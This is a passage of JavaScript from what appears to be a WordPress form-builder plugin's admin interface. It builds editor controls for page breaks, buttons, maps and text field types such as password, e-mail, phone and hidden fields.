		el_title_previous.setAttribute("id", "el_title_previous");
		el_title_previous.setAttribute("type", "text");
		el_title_previous.setAttribute("value", w_title[1]);
		el_title_previous.setAttribute("onKeyUp", "change_pagebreak_label( this.value, 'previous');");
		el_title_previous.setAttribute("onChange", "change_pagebreak_label( this.value, 'previous');");
			
	var el_style_previous_label = document.createElement('label');
		el_style_previous_label.setAttribute("class", "fm-field-label");
		el_style_previous_label.setAttribute("for", "previous_element_style");
		el_style_previous_label.innerHTML = "Previous class name";
	
	var el_style_previous_textarea = document.createElement('input');
		el_style_previous_textarea.setAttribute("id", "previous_element_style");
		el_style_previous_textarea.setAttribute("type", "text");
		el_style_previous_textarea.setAttribute("value", w_class[1]);
		el_style_previous_textarea.setAttribute("onChange", "change_pagebreak_class(this.value, 'previous')");

	var el_check_previous_label = document.createElement('label');
		el_check_previous_label.setAttribute("class", "fm-field-label");
		el_check_previous_label.setAttribute("for", "el_check_previous_input");
		el_check_previous_label.innerHTML = "Check the required fields";
		
	var el_check_previous_input = document.createElement('input');
		el_check_previous_input.setAttribute("id", "el_check_previous_input");
		el_check_previous_input.setAttribute("type", "checkbox");
		el_check_previous_input.setAttribute("onClick", "set_checkable('previous');");
			
	if(w_check[1] == "true")
		el_check_previous_input.setAttribute("checked","checked");
	
	var el_attr_label = document.createElement('label');
		el_attr_label.setAttribute("class", "fm-field-label");       
		el_attr_label.innerHTML = "Additional Attributes";
	var el_attr_add = document.createElement('img');     
		el_attr_add.setAttribute("src", plugin_url + '/images/add.png?ver=1.8.0');
		el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
		el_attr_add.setAttribute("title", 'add');
		el_attr_add.setAttribute("onClick", "add_attr( 'type_checkbox')");

	var el_attr_table = document.createElement('table');
		el_attr_table.setAttribute("id", 'attributes');
		el_attr_table.setAttribute("border", '0');
		el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
		el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
		el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
		el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
		el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
		el_attr_name_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
		el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
		el_attr_value_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
		el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n = w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
			el_attr_name.setAttribute("type", "text");
			el_attr_name.style.cssText = "width:100px";
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_checkbox')");
			
		var el_attr_value = document.createElement('input');
			el_attr_value.setAttribute("type", "text");
			el_attr_value.style.cssText = "width:100px";
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_checkbox')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:2px';
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_checkbox')");
			
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
	}

	var t  = document.getElementById('edit_table');
	var br = document.createElement('br');
	var br1 = document.createElement('br');

	edit_main_td1.appendChild(el_page_title_label);
	edit_main_td1_1.appendChild(el_page_title_input);
	
	edit_main_td3.appendChild(el_type_next_label);
	edit_main_td3_1.appendChild(el_type_next_text);
	edit_main_td3_1.appendChild(el_label_text_next);
	edit_main_td3_1.appendChild(el_type_next_img);
	edit_main_td3_1.appendChild(el_label_image_next);
	
	edit_main_td7.appendChild(el_title_next_label);
	edit_main_td7_1.appendChild(el_title_next);
	
	edit_main_td8.appendChild(el_style_next_label);
	edit_main_td8_1.appendChild(el_style_next_textarea);
	
	edit_main_td9.appendChild(el_check_next_label);
	edit_main_td9_1.appendChild(el_check_next_input);

	edit_main_td4.appendChild(el_type_previous_label);
	edit_main_td4_1.appendChild(el_type_previous_text);
	edit_main_td4_1.appendChild(el_label_text_previous);
	edit_main_td4_1.appendChild(el_type_previous_img);
	edit_main_td4_1.appendChild(el_label_image_previous);
	
	edit_main_td5.appendChild(el_title_previous_label);
	edit_main_td5_1.appendChild(el_title_previous);
	
	edit_main_td10.appendChild(el_style_previous_label);
	edit_main_td10_1.appendChild(el_style_previous_textarea);

	edit_main_td11.appendChild(el_check_previous_label);
	edit_main_td11_1.appendChild(el_check_previous_input);
	
	
	
	edit_main_td2.appendChild(el_attr_label);
	edit_main_td2.appendChild(el_attr_add);
	edit_main_td2.appendChild(br);
	edit_main_td2.appendChild(el_attr_table);
	edit_main_td2.setAttribute("colspan", "2");
	
	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_tr7.appendChild(edit_main_td7_1);
	edit_main_tr8.appendChild(edit_main_td8);
	edit_main_tr8.appendChild(edit_main_td8_1);
	edit_main_tr9.appendChild(edit_main_td9);
	edit_main_tr9.appendChild(edit_main_td9_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr10.appendChild(edit_main_td10);
	edit_main_tr10.appendChild(edit_main_td10_1);
	edit_main_tr11.appendChild(edit_main_td11);
	edit_main_tr11.appendChild(edit_main_td11_1);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr7);
	edit_main_table.appendChild(edit_main_tr8);
	edit_main_table.appendChild(edit_main_tr9);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr10);
	edit_main_table.appendChild(edit_main_tr11);
	edit_main_table.appendChild(edit_main_tr2);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	
    var div = document.createElement('div');
       	div.setAttribute("id", "main_div");

	var div_field = document.createElement('div');
		div_field.setAttribute("id", i+"_elemet_tableform_id_temp");
						
	var div_label = document.createElement('div');
		div_label.setAttribute("align", 'left');
		div_label.style.display="table-cell";
		div_label.setAttribute("id", i+"_label_sectionform_id_temp");
		
	var div_element = document.createElement('div');
		div_element.setAttribute("align", 'left');
		div_element.style.display="table-cell";
		div_element.setAttribute("id", i+"_element_sectionform_id_temp");
	
	var adding_next = document.createElement('div');
		adding_next.setAttribute("align","right");
		adding_next.setAttribute("id","_element_section_next");
	
	var adding_next_button =  make_pagebreak_button('next',w_title[0],w_type[0], w_class[0] , 0)	;
			
	adding_next.appendChild(adding_next_button);
	
	var adding_previous = document.createElement('div');
		adding_previous.setAttribute("align","left");
		adding_previous.setAttribute("id","_element_section_previous");
	    
	var adding_previous_button =  make_pagebreak_button('previous',w_title[1],w_type[1], w_class[1] , 0);
				
	adding_previous.appendChild(adding_previous_button);
		
	var div_fields = document.createElement('div');
		div_fields.setAttribute("align","center");
		div_fields.setAttribute("style","border:2px solid blue;padding:20px; margin:20px");
		div_fields.innerHTM = 'FIELDS';
		
	var div_page_title = document.createElement('div');
		div_page_title.innerHTML = w_page_title+'<br/><br/>';
		div_page_title.setAttribute("id", "div_page_title");
		div_page_title.setAttribute("align","center");
	
	var div_between = document.createElement('div');
		div_between.setAttribute("page_title", w_page_title);
		div_between.setAttribute("next_type", w_type[0]);
		div_between.setAttribute("next_title", w_title[0]);
		div_between.setAttribute("next_class", w_class[0]);
		div_between.setAttribute("next_checkable", w_check[0]);
		div_between.setAttribute("previous_type", w_type[1]);
		div_between.setAttribute("previous_title", w_title[1]);
		div_between.setAttribute("previous_class", w_class[1]);
		div_between.setAttribute("previous_checkable", w_check[1]);
		div_between.setAttribute("align","center");
		div_between.setAttribute("id", "_div_between");
		div_between.innerHTML = "--------------------------------------<br />P A G E B R E A K<br />--------------------------------------"
				
	div_element.appendChild(div_page_title);
	div_element.appendChild(div_fields);
	div_element.appendChild(adding_next);
	div_element.appendChild(div_between);
	div_element.appendChild(adding_previous);
		
	var main_td  = document.getElementById('show_table');

	div_field.appendChild(div_element);
	div.appendChild(div_field);
	div.appendChild(br1);
	main_td.appendChild(div);

	refresh_attr(i, 'type_page_break');
}

function set_checkable(type)
{
	document.getElementById("_div_between").setAttribute(type+'_checkable',document.getElementById("el_check_"+type+"_input").checked);
}

function pagebreak_title_change(val) {
  val = val.replace(/(<([^>]+)>)/ig, "");
	document.getElementById("_div_between").setAttribute('page_title',val);
	document.getElementById("div_page_title").innerHTML=val+'<br/><br/>';
}

function change_pagebreak_class(val, type)
{
	document.getElementById("page_"+type+'_0').setAttribute('class', val);
	document.getElementById("_div_between").setAttribute(type+'_class',val);
}

function change_pagebreak_label(val, type)
{
button_type=document.getElementById("_div_between").getAttribute(type+'_type');
if(button_type!="img")
{
	document.getElementById("page_"+type+'_0').value=val;
	document.getElementById("page_"+type+'_0').innerHTML=val;
}
else
{
	document.getElementById("page_"+type+'_0').src=val;
}
	document.getElementById("_div_between").setAttribute(type+'_title',val);

}

function pagebreak_type_change( pagebreak_type, button_type)
{
document.getElementById("_div_between").setAttribute(pagebreak_type+'_type',button_type);
	switch(button_type)
	{
		case 'button': 
		{ 
			document.getElementById("_div_between").setAttribute(pagebreak_type+'_title', pagebreak_type);
			
			var el_title_label = document.createElement('label');
				el_title_label.setAttribute("class", "fm-field-label");
				el_title_label.setAttribute("for", "el_title_"+pagebreak_type);
				el_title_label.setAttribute('id', pagebreak_type+"_label");
				el_title_label.setAttribute('type', "button");
				el_title_label.innerHTML = pagebreak_type[0].toUpperCase() + pagebreak_type.slice(1)+" "+ button_type+" name";
			
			document.getElementById(pagebreak_type+"_label").parentNode.replaceChild(el_title_label, document.getElementById(pagebreak_type+"_label"));
			
			document.getElementById("el_title_"+pagebreak_type).value=pagebreak_type;
			
			var element = document.createElement('button');
				element.setAttribute('id', "page_"+pagebreak_type+'_0');
				element.setAttribute('class', document.getElementById("_div_between").getAttribute(pagebreak_type+'_class'));
				element.style.cursor="pointer";
				element.innerHTML=pagebreak_type;
				
			
			document.getElementById("_element_section_"+pagebreak_type).replaceChild(element, document.getElementById("page_"+pagebreak_type+'_0'));
			
			break;
		}
		case 'text': {	

			document.getElementById("_div_between").setAttribute(pagebreak_type+'_title', pagebreak_type);
		
			var el_title_label = document.createElement('label');
				el_title_label.setAttribute("class", "fm-field-label");
				el_title_label.setAttribute("for", "el_title_"+pagebreak_type);
				el_title_label.setAttribute('id', pagebreak_type+"_label");
				el_title_label.innerHTML = pagebreak_type[0].toUpperCase() + pagebreak_type.slice(1)+" "+ button_type+" name";

			document.getElementById(pagebreak_type+"_label").parentNode.replaceChild(el_title_label, document.getElementById(pagebreak_type+"_label"));
			
			document.getElementById("el_title_"+pagebreak_type).value=pagebreak_type;
			
			var element = document.createElement('span');
				element.setAttribute('id', "page_"+pagebreak_type+'_0');
				element.setAttribute('class', document.getElementById("_div_between").getAttribute(pagebreak_type+'_class'));
				element.style.cursor="pointer";
				element.innerHTML=pagebreak_type;

			document.getElementById("_element_section_"+pagebreak_type).replaceChild(element, document.getElementById("page_"+pagebreak_type+'_0'));
			
			  break;
		}
		case 'img':{ 			
		
		document.getElementById("_div_between").setAttribute(pagebreak_type+'_title', plugin_url + '/images/'+pagebreak_type+'.png');
			
		var el_title_label = document.createElement('label');
				el_title_label.setAttribute("class", "fm-field-label");
				el_title_label.setAttribute("for", "el_title_"+pagebreak_type);
				el_title_label.setAttribute('id', pagebreak_type+"_label");
				el_title_label.innerHTML = pagebreak_type[0].toUpperCase() + pagebreak_type.slice(1)+" "+ button_type+" src";

			document.getElementById(pagebreak_type+"_label").parentNode.replaceChild(el_title_label, document.getElementById(pagebreak_type+"_label"));
			
			document.getElementById("el_title_"+pagebreak_type).value=plugin_url + '/images/'+pagebreak_type+'.png';
			
			var element = document.createElement('img');
				element.setAttribute('id', "page_"+pagebreak_type+'_0');
				element.setAttribute('class', document.getElementById("_div_between").getAttribute(pagebreak_type+'_class'));
				element.style.cursor="pointer";
				element.src=plugin_url + '/images/'+pagebreak_type+'.png';
				
			document.getElementById("_element_section_"+pagebreak_type).replaceChild(element, document.getElementById("page_"+pagebreak_type+'_0'));
			
			  break;
		}

}
}

function addRow(b) 
{

	if(document.getElementById('show_table').innerHTML)
	{
		document.getElementById('show_table').innerHTML="";
		document.getElementById('edit_table').innerHTML="";
	}
	
	alltypes=Array('customHTML','text','checkbox','radio','time_and_date','select','file_upload','captcha','map','button','page_break','section_break','paypal','survey');
	for(x=0; x<14;x++)
	{
		document.getElementById('img_'+alltypes[x]).parentNode.style.backgroundColor='';
	}
	
		document.getElementById('img_'+b).parentNode.style.backgroundColor='#fff';
	/*	document.getElementById('img_'+b).style.width='90px';*/
	
	switch(b)
	{
		case 'customHTML': { el_editor();  break;}
		case 'text': { el_text();  break;}

		case 'captcha':{ el_captcha(); break; }
		case 'map':{ el_map(); break; }
		case 'button':{ el_button(); break; }
		case 'page_break':{ el_page_break(); break; }
		case 'section_break':{ el_section_break(); break; }
	}
	
	var pos=document.getElementsByName("el_pos");
			pos[0].checked="checked";

}


function el_section_break()
{
	if(document.getElementById("editing_id").value)
		new_id=document.getElementById("editing_id").value;
	else
		new_id=gen;
	

	var pos=document.getElementsByName("el_pos");
			pos[0].removeAttribute("disabled");
			pos[1].removeAttribute("disabled");
			pos[2].removeAttribute("disabled");
			
	var sel_el_pos=document.getElementById("sel_el_pos");
		sel_el_pos.removeAttribute("disabled", "disabled");
	
	type_section_break(new_id,"<div class='wdform-section-break-div' style='min-width: 300px; border-top:1px solid'></div>");
}



function el_button()
{
	
if(document.getElementById("editing_id").value)
	new_id=document.getElementById("editing_id").value;
else
	new_id=gen;
	


//edit table
	var td  = document.getElementById('edit_table');
	//type select		
	var el_type_label = document.createElement('label');
	
	el_type_label.style.cssText = "color: #000; font-weight: bold; font-size: 13px";
	el_type_label.innerHTML = "<br />&nbsp;&nbsp;Field type";
	td.appendChild(el_type_label);
	var el_type_radio_submit_reset = document.createElement('input');
				el_type_radio_submit_reset.setAttribute("id", "el_type_submit_reset");
                el_type_radio_submit_reset.setAttribute("type", "radio");
		el_type_radio_submit_reset.style.cssText = "margin-left:15px";
                el_type_radio_submit_reset.setAttribute("name", "el_type");
                el_type_radio_submit_reset.setAttribute("onclick", "go_to_type_submit_reset('"+new_id+"')");
		el_type_radio_submit_reset.setAttribute("checked", "checked");
		
	var el_type_label_submit_reset = document.createElement('label');	
		el_type_label_submit_reset.setAttribute("for", "el_type_submit_reset");
		el_type_label_submit_reset.innerHTML = 'Submit and Reset';	

		
	var el_type_radio_custom = document.createElement('input');
		el_type_radio_custom.setAttribute("id", "el_type_custom");
        el_type_radio_custom.setAttribute("type", "radio");
		el_type_radio_custom.style.cssText = "margin-left:15px";         
	    el_type_radio_custom.setAttribute("name", "el_type");
        el_type_radio_custom.setAttribute("onclick", "go_to_type_button('"+new_id+"')");
				
	var el_type_label_custom = document.createElement('label');	
		el_type_label_custom.setAttribute("for", "el_type_custom");
		el_type_label_custom.innerHTML = 'Custom';			
		
		
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
	var br5 = document.createElement('br');
	

	td.appendChild(br1);
	td.appendChild(el_type_radio_submit_reset);
	td.appendChild(el_type_label_submit_reset);
	td.appendChild(br2);
	td.appendChild(el_type_radio_custom);
	td.appendChild(el_type_label_custom);

	var pos=document.getElementsByName("el_pos");
			pos[0].removeAttribute("disabled");
			pos[1].removeAttribute("disabled");
			pos[2].removeAttribute("disabled");
			
	var sel_el_pos=document.getElementById("sel_el_pos");
		sel_el_pos.removeAttribute("disabled", "disabled");

	go_to_type_submit_reset(new_id);
	
}

function go_to_type_hidden(new_id)
{
 	w_attr_name=[];
 	w_attr_value=[];
	type_hidden(new_id,'', '', '', w_attr_name, w_attr_value);
}

function go_to_type_submit_reset(new_id)
{
 	w_attr_name=[];
 	w_attr_value=[];
	type_submit_reset(new_id,'Submit', 'Reset', '', true, w_attr_name, w_attr_value);
}

function go_to_type_mark_map(new_id)
{
 	w_attr_name=[];
 	w_attr_value=[];
	type_mark_map(new_id, 'Mark your place on map:', '100', 'left', '2.294254', '48.858334', "2.294254", "48.858334", "13", "400","300", 'wdform_map', '', w_attr_name, w_attr_value);
}

function el_map()
{
	if(document.getElementById("editing_id").value)
		new_id=document.getElementById("editing_id").value;
	else
		new_id=gen;
	
 	w_long=['2.294254'];
 	w_lat=['48.858334'];
 	w_info=[''];

	var pos=document.getElementsByName("el_pos");
			pos[0].removeAttribute("disabled");
			pos[1].removeAttribute("disabled");
			pos[2].removeAttribute("disabled");
		
	var sel_el_pos=document.getElementById("sel_el_pos");
		sel_el_pos.removeAttribute("disabled", "disabled");

 	w_attr_name=[];
 	w_attr_value=[];
	type_map(new_id, '2.294254', '48.858334', w_long, w_lat, "13", "400","300", 'wdform_map', w_info, w_attr_name, w_attr_value);
}

function el_editor()
{
	if(document.getElementById("editing_id").value)
	new_id=document.getElementById("editing_id").value;
else
	new_id=gen;
	

	var pos=document.getElementsByName("el_pos");
			pos[0].removeAttribute("disabled");
			pos[1].removeAttribute("disabled");
			pos[2].removeAttribute("disabled");
	
	var sel_el_pos=document.getElementById("sel_el_pos");
		sel_el_pos.removeAttribute("disabled", "disabled");

	type_editor(new_id,'');
}

function el_text()
{
	if(document.getElementById("editing_id").value)
		new_id=document.getElementById("editing_id").value;
	else
		new_id=gen;

	//edit table
	var td  = document.getElementById('edit_table');
	//type select		
	var el_type_label = document.createElement('label');
	
	el_type_label.style.cssText = "color: #000; font-weight: bold; font-size: 13px";
	//el_type_label.setAttribute("style" , "color: #000; font-weight: bold; font-size: 13px", 0 );
	el_type_label.innerHTML = "<br />&nbsp;&nbsp;Field type";
	td.appendChild(el_type_label);

	var el_type_radio_text = document.createElement('input');
                el_type_radio_text.setAttribute("id", "el_type_radio_text");
                el_type_radio_text.setAttribute("type", "radio");
				el_type_radio_text.style.cssText = "margin-left:15px";
                el_type_radio_text.setAttribute("value", "text");
                el_type_radio_text.setAttribute("name", "el_type");
                el_type_radio_text.setAttribute("onclick", "go_to_type_text('"+new_id+"')");
		el_type_radio_text.setAttribute("checked", "checked");
		
	var el_type_label_text = document.createElement('label');	
		el_type_label_text.setAttribute("for", "el_type_radio_text");
		el_type_label_text.innerHTML = 'Simple text';

		
	var el_type_radio_password = document.createElement('input');
                el_type_radio_password.setAttribute("id", "el_type_radio_password");
                el_type_radio_password.setAttribute("type", "radio");
				el_type_radio_password.style.cssText = "margin-left:15px";
                el_type_radio_password.setAttribute("value", "password");
                el_type_radio_password.setAttribute("name", "el_type");
                el_type_radio_password.setAttribute("onclick", "go_to_type_password('"+new_id+"')");
				
	var el_type_label_password = document.createElement('label');	
		el_type_label_password.setAttribute("for", "el_type_radio_password");
		el_type_label_password.innerHTML = 'Password';
	

	var el_type_radio_textarea = document.createElement('input');
                el_type_radio_textarea.setAttribute("id", "el_type_radio_textarea");
                el_type_radio_textarea.setAttribute("type", "radio");
				el_type_radio_textarea.style.cssText = "margin-left:15px";
                el_type_radio_textarea.setAttribute("value", "textarea");
                el_type_radio_textarea.setAttribute("name", "el_type");
                el_type_radio_textarea.setAttribute("onclick", "go_to_type_textarea('"+new_id+"')");
				
	var el_type_label_textarea = document.createElement('label');	
		el_type_label_textarea.setAttribute("for", "el_type_radio_textarea");
		el_type_label_textarea.innerHTML = 'Text area';

	/*var el_type_radio_editor = document.createElement('input');
                el_type_radio_editor.setAttribute("id", "el_type_radio_editor");
                el_type_radio_editor.setAttribute("type", "radio");
				el_type_radio_editor.style.cssText = "margin-left:15px";
                el_type_radio_editor.setAttribute("value", "editor");
                el_type_radio_editor.setAttribute("name", "el_type");
                el_type_radio_editor.setAttribute("onclick", "go_to_type_wdeditor('"+new_id+"')");
	
	var el_type_label_editor = document.createElement('label');	
		el_type_label_editor.setAttribute("for", "el_type_radio_editor");
		el_type_label_editor.innerHTML = 'Editor';*/

		
	var el_type_radio_name = document.createElement('input');
                el_type_radio_name.setAttribute("id", "el_type_radio_name");
                el_type_radio_name.setAttribute("type", "radio");
				el_type_radio_name.style.cssText = "margin-left:15px";
                el_type_radio_name.setAttribute("value", "name");
                el_type_radio_name.setAttribute("name", "el_type");
                el_type_radio_name.setAttribute("onclick", "go_to_type_name('"+new_id+"')");
				
	var el_type_label_name = document.createElement('label');	
		el_type_label_name.setAttribute("for", "el_type_radio_name");
		el_type_label_name.innerHTML = 'Name';
				
			
	var el_type_radio_submitter_mail= document.createElement('input');
                el_type_radio_submitter_mail.setAttribute("id", "el_type_radio_submitter_mail");
                el_type_radio_submitter_mail.setAttribute("type", "radio");
				el_type_radio_submitter_mail.style.cssText = "margin-left:15px";
                el_type_radio_submitter_mail.setAttribute("value", "submitter_mail");
                el_type_radio_submitter_mail.setAttribute("name", "el_type");
                el_type_radio_submitter_mail.setAttribute("onclick", "go_to_type_submitter_mail('"+new_id+"')");
				
	var el_type_label_submitter_mail = document.createElement('label');	
		el_type_label_submitter_mail.setAttribute("for", "el_type_radio_submitter_mail");
		el_type_label_submitter_mail.innerHTML = 'E-mail';
				
	var el_type_radio_send_copy= document.createElement('input');
                el_type_radio_send_copy.setAttribute("id", "el_type_radio_send_copy");
                el_type_radio_send_copy.setAttribute("type", "radio");
				el_type_radio_send_copy.style.cssText = "margin-left:15px";
                el_type_radio_send_copy.setAttribute("value", "submitter_mail");
                el_type_radio_send_copy.setAttribute("name", "el_type");
                el_type_radio_send_copy.setAttribute("onclick", "go_to_type_send_copy('"+new_id+"')");
				
	var el_type_label_send_copy = document.createElement('label');	
		el_type_label_send_copy.setAttribute("for", "el_type_radio_send_copy");
		el_type_label_send_copy.innerHTML = 'Send copy to submitter';
				
	
	var el_type_radio_number= document.createElement('input');
                el_type_radio_number.setAttribute("id", "el_type_radio_number");
                el_type_radio_number.setAttribute("type", "radio");
				el_type_radio_number.style.cssText = "margin-left:15px";
                el_type_radio_number.setAttribute("value", "number");
                el_type_radio_number.setAttribute("name", "el_type");
                el_type_radio_number.setAttribute("onclick", "go_to_type_number('"+new_id+"')");
				
	var el_type_label_number = document.createElement('label');	
		el_type_label_number.setAttribute("for", "el_type_radio_number");
		el_type_label_number.innerHTML = 'Number';
				
	
	var el_type_radio_phone= document.createElement('input');
                el_type_radio_phone.setAttribute("id", "el_type_radio_phone");
                el_type_radio_phone.setAttribute("type", "radio");
				el_type_radio_phone.style.cssText = "margin-left:15px";
                el_type_radio_phone.setAttribute("value", "phone");
                el_type_radio_phone.setAttribute("name", "el_type");
                el_type_radio_phone.setAttribute("onclick", "go_to_type_phone('"+new_id+"')");
				
	var el_type_label_phone = document.createElement('label');	
		el_type_label_phone.setAttribute("for", "el_type_radio_phone");
		el_type_label_phone.innerHTML = 'Phone';
				
	
	var el_type_radio_hidden = document.createElement('input');
				el_type_radio_hidden.setAttribute("id", "el_type_hidden");
                el_type_radio_hidden.setAttribute("type", "radio");
				el_type_radio_hidden.style.cssText = "margin-left:15px";
                el_type_radio_hidden.setAttribute("name", "el_type");
                el_type_radio_hidden.setAttribute("onclick", "go_to_type_hidden('"+new_id+"')");
				
	var el_type_label_hidden = document.createElement('label');	
		el_type_label_hidden.setAttribute("for", "el_type_hidden");
		el_type_label_hidden.innerHTML = 'Hidden field';
				
			
var el_type_radio_address = document.createElement('input');
                el_type_radio_address.setAttribute("id", "el_type_radio_address");
                el_type_radio_address.setAttribute("type", "radio");
				el_type_radio_address.style.cssText = "margin-left:15px";
                el_type_radio_address.setAttribute("value", "address");
                el_type_radio_address.setAttribute("name", "el_type");
                el_type_radio_address.setAttribute("onchange", "go_to_type_address('"+new_id+"')");
				
	var el_type_label_address = document.createElement('label');	
		el_type_label_address.setAttribute("for", "el_type_radio_address");
		el_type_label_address.innerHTML = 'Address';
				
			
var el_type_radio_mark_map = document.createElement('input');
                el_type_radio_mark_map.setAttribute("id", "el_type_radio_mark_map");
                el_type_radio_mark_map.setAttribute("type", "radio");
				el_type_radio_mark_map.style.cssText = "margin-left:15px";
                el_type_radio_mark_map.setAttribute("value", "mark_map");
                el_type_radio_mark_map.setAttribute("name", "el_type");
                el_type_radio_mark_map.setAttribute("onchange", "go_to_type_mark_map('"+new_id+"')");
				
	var el_type_label_mark_map = document.createElement('label');	
		el_type_label_mark_map.setAttribute("for", "el_type_radio_mark_map");
		el_type_label_mark_map.innerHTML = 'Address(mark on map)';
				
		
	
	
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	var br7 = document.createElement('br');
	var br8 = document.createElement('br');
	var br9 = document.createElement('br');
	var br10 = document.createElement('br');
	var br11 = document.createElement('br');
	var br12 = document.createElement('br');
	

	td.appendChild(br1);
	td.appendChild(el_type_radio_text);
	td.appendChild(el_type_label_text);
	td.appendChild(br2);
	td.appendChild(el_type_radio_password);
	td.appendChild(el_type_label_password);
	td.appendChild(br3);
	td.appendChild(el_type_radio_textarea);
	td.appendChild(el_type_label_textarea);
	td.appendChild(br4);
	// td.appendChild(el_type_radio_editor);
	// td.appendChild(el_type_label_editor);
	// td.appendChild(br11);
	td.appendChild(el_type_radio_name);
	td.appendChild(el_type_label_name);
	td.appendChild(br5);
	td.appendChild(el_type_radio_address);
	td.appendChild(el_type_label_address);
	td.appendChild(br10);
	td.appendChild(el_type_radio_mark_map);
	td.appendChild(el_type_label_mark_map);
	td.appendChild(br12);
	td.appendChild(el_type_radio_submitter_mail);
	td.appendChild(el_type_label_submitter_mail);
	td.appendChild(br6);
	td.appendChild(el_type_radio_send_copy);
	td.appendChild(el_type_label_send_copy);
	td.appendChild(br9);
	td.appendChild(el_type_radio_number);
	td.appendChild(el_type_label_number);
	td.appendChild(br7);
	td.appendChild(el_type_radio_phone);
	td.appendChild(el_type_label_phone);
	td.appendChild(br8);
	td.appendChild(el_type_radio_hidden);
	td.appendChild(el_type_label_hidden);
	
	var pos=document.getElementsByName("el_pos");
			pos[0].removeAttribute("disabled");
			pos[1].removeAttribute("disabled");
			pos[2].removeAttribute("disabled");
			
	var sel_el_pos=document.getElementById("sel_el_pos");
		sel_el_pos.removeAttribute("disabled", "disabled");
			
	go_to_type_text(new_id);
	
}

function go_to_type_text(new_id)
{
 	w_attr_name=[];
 	w_attr_value=[];
	type_text(new_id,'Text:', '100', 'left', '200', '', '', 'no', 'no', '', '', '', 'Incorrect Value', 'no', w_attr_name, w_attr_value);
}

function go_to_type_send_copy(new_id)
{
	if(jQuery('#take').find(jQuery("div[type='type_send_copy']")).length != 0)
	{
		alert("This field already has been created.");
		document.getElementById("el_type_radio_text").checked=true;
		go_to_type_text(new_id);
		return;
	}
 	w_attr_name=[];
 	w_attr_value=[];
	type_send_copy(new_id,'Send a copy of this message to yourself', '300', 'left', false, 'no', w_attr_name, w_attr_value);
}

function go_to_type_number(new_id)
{
 	w_attr_name=[];
 	w_attr_value=[];
	type_number(new_id,'Number:', '100', 'left', '200', '', '', 'no', 'no', '',w_attr_name, w_attr_value);
}

function go_to_type_password(new_id)
{
 	w_attr_name=[];
 	w_attr_value=[];
	type_password(new_id,'Password:', '100', 'left', '200', 'no', 'no', 'wdform_input',w_attr_name, w_attr_value);
}

function go_to_type_textarea(new_id)
{
 	w_attr_name=[];
 	w_attr_value=[];
	type_textarea(new_id,'Textarea:', '100', 'left', '200', '100', '','', 'no', 'no', '',w_attr_name, w_attr_value)
}

function go_to_type_wdeditor(new_id)
{
 	w_attr_name=[];
 	w_attr_value=[];
	type_wdeditor(new_id,'Editor:', '100', 'left', '380', '200', '', 'no', '',w_attr_name, w_attr_value)
}



function go_to_type_name(new_id)
{
 	w_attr_name = [];
 	w_attr_value = [];
 	w_first_val = ['', '', '', ''];
 	w_title = ['', '', '', ''];
	w_mini_labels = ['Title','First','Last','Middle'];
